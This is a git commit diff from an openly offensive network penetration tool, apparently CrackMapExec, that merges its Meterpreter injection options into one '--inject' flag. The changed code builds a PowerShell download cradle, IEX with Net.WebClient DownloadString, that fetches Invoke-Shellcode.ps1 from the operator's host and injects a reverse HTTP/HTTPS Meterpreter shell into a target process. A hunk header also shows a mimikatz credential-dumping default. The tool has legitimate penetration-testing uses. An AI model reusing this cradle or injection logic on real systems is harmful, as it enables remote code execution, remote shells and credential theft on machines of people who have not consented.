Consolidated Meterpreter injection options
parent
cd048eab37
commit
e48fc47e11
|
@ -107,15 +107,13 @@ Command Execution:
|
||||||
Shellcode/EXE/DLL/Meterpreter Injection:
|
Shellcode/EXE/DLL/Meterpreter Injection:
|
||||||
Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell
|
Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell
|
||||||
|
|
||||||
--inject {shellcode,exe,meterpreter,dll}
|
--inject {met_reverse_http,met_reverse_https,exe,shellcode,dll}
|
||||||
Inject Shellcode, EXE, DLL or Meterpreter
|
Inject Shellcode, EXE, DLL or Meterpreter
|
||||||
--path PATH Path to the Shellcode/EXE/DLL you want to inject on the target systems
|
--path PATH Path to the Shellcode/EXE/DLL you want to inject on the target systems
|
||||||
--procid PROCID Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)
|
--procid PROCID Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)
|
||||||
--exeargs EXEARGS Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)
|
--exeargs EXEARGS Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)
|
||||||
--met {reverse_https,reverse_http}
|
|
||||||
Specify the Meterpreter to inject
|
|
||||||
--met-options LHOST LPORT
|
--met-options LHOST LPORT
|
||||||
Meterpreter options
|
Meterpreter options (ignored if not injecting Meterpreter)
|
||||||
|
|
||||||
Filesystem Interaction:
|
Filesystem Interaction:
|
||||||
Options for interacting with filesystems
|
Options for interacting with filesystems
|
||||||
|
|
|
@ -2661,11 +2661,11 @@ def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurl
|
||||||
|
|
||||||
def inject_pscommand(localip):
|
def inject_pscommand(localip):
|
||||||
|
|
||||||
if args.inject == 'meterpreter':
|
if args.inject.startswith('met_'):
|
||||||
command = """
|
command = """
|
||||||
IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1');
|
IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1');
|
||||||
Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip,
|
Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip,
|
||||||
args.met,
|
args.inject[4:],
|
||||||
args.met_options[0],
|
args.met_options[0],
|
||||||
args.met_options[1])
|
args.met_options[1])
|
||||||
if args.procid:
|
if args.procid:
|
||||||
|
@ -3010,12 +3010,11 @@ if __name__ == '__main__':
|
||||||
cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command')
|
cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command')
|
||||||
|
|
||||||
xgroup = parser.add_argument_group("Shellcode/EXE/DLL/Meterpreter Injection", "Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell")
|
xgroup = parser.add_argument_group("Shellcode/EXE/DLL/Meterpreter Injection", "Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell")
|
||||||
xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll', 'meterpreter'}, help='Inject Shellcode, EXE, DLL or Meterpreter')
|
xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll', 'met_reverse_https', 'met_reverse_http'}, help='Inject Shellcode, EXE, DLL or Meterpreter')
|
||||||
xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems')
|
xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems')
|
||||||
xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)')
|
xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)')
|
||||||
xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)')
|
xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)')
|
||||||
xgroup.add_argument("--met", choices={'reverse_http', 'reverse_https'}, dest='met', help='Specify the Meterpreter to inject')
|
xgroup.add_argument("--met-options", nargs=2, metavar=('LHOST', 'LPORT'), dest='met_options', help='Meterpreter options (ignored if not injecting Meterpreter)')
|
||||||
xgroup.add_argument("--met-options", nargs=2, metavar=('LHOST', 'LPORT'), dest='met_options', help='Meterpreter options')
|
|
||||||
|
|
||||||
bgroup = parser.add_argument_group("Filesystem Interaction", "Options for interacting with filesystems")
|
bgroup = parser.add_argument_group("Filesystem Interaction", "Options for interacting with filesystems")
|
||||||
bgroup.add_argument("--list", metavar='PATH', help='List contents of a directory')
|
bgroup.add_argument("--list", metavar='PATH', help='List contents of a directory')
|
||||||
|
@ -3036,7 +3035,7 @@ if __name__ == '__main__':
|
||||||
log.setLevel(logging.INFO)
|
log.setLevel(logging.INFO)
|
||||||
|
|
||||||
if args.inject:
|
if args.inject:
|
||||||
if args.inject != 'meterpreter':
|
if not args.inject.startswith('met_'):
|
||||||
if not args.path:
|
if not args.path:
|
||||||
print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject")
|
print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject")
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
@ -3046,9 +3045,9 @@ if __name__ == '__main__':
|
||||||
print_error('Unable to find Shellcode/EXE/DLL at specified path')
|
print_error('Unable to find Shellcode/EXE/DLL at specified path')
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
elif args.inject == 'meterpreter':
|
elif args.inject.startswith('met_'):
|
||||||
if not args.met_options or not args.met:
|
if not args.met_options:
|
||||||
print_error('You must specify a Meterpreter and it\'s options using \'--met\' and \'--met-options\'' )
|
print_error('You must specify Meterpreter\'s options using --met-options' )
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
if os.path.exists(args.target[0]):
|
if os.path.exists(args.target[0]):
|
||||||
|
|
Loading…
Reference in New Issue